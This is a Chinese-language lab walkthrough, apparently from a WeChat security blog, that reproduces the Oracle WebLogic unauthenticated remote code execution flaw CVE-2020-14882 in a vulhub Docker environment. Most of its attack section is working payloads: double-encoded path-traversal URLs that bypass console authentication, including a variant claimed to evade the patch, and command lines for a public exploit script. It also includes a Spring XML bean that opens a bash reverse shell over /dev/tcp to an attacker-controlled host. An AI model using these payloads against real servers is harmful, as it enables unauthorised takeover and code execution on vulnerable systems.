漏洞描述 :
2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
环境搭建
进入相关环境
启动容器
docker-compose up -d //启动环境
docker-compose ps -a //查看状态
浏览访问
ip+分配的端口(7001)
以下页面正常
拼接poc,再访问
poc:/console/login/LoginForm.jsp
账号密码别管,应该是我的浏览器缓存
未授权访问后台
权限漏洞绕过,主要的POC如下:
/console/images/%252E%252E%252Fconsole.portal
/console/css/%25%32%65%25%32%65%25%32%66console.portal
大写换成小写可绕过补丁:
/console/css/%252e%252e%252fconsole.portal
漏洞利用 命令执行
直接上脚本:https://github.com/backlion/CVE-2020-14882_ALL
脚本解压,进入解压后的目录cmd
(我这里的python环境是3,你们可以试一下其它的,因为不知道有没有影响,所以写一下)
python CVE-2020-14882_ALL.py -u http://192.168.10.30:7001 -c "ls"
无回显的利用
外置xml文件无回显命令执行
复制以下内容,修改反弹shell的ip与端口。保存为poc.xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>/bin/bash</value> <value>-c</value> <value><![CDATA[bash -i >& /dev/tcp/192.168.10.55/4444 0>&1]]></value> </list> </constructor-arg> </bean> </beans> |
开启kali临时开启一个http服务
把编辑好的poc.xml文件保存到kali里,在当前目录开启临时http服务 指定8888端口
访问http服务,可以看见编辑好的文件
kali开启监听端口
(监听端口对应poc.xml文件中反弹shell的端口)
主机运行脚本
python3 CVE-2020-14882_ALL.py -u http://靶机ip:7001/ -x http://kaliIP:8888/poc.xml |
kali反弹shell
参考文章
https://www.cnblogs.com/backlion/p/13951858.html
原文始发于微信公众号(小白摸坑学网安):CVE-2020-14882【vulhub weblogic漏洞复现】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论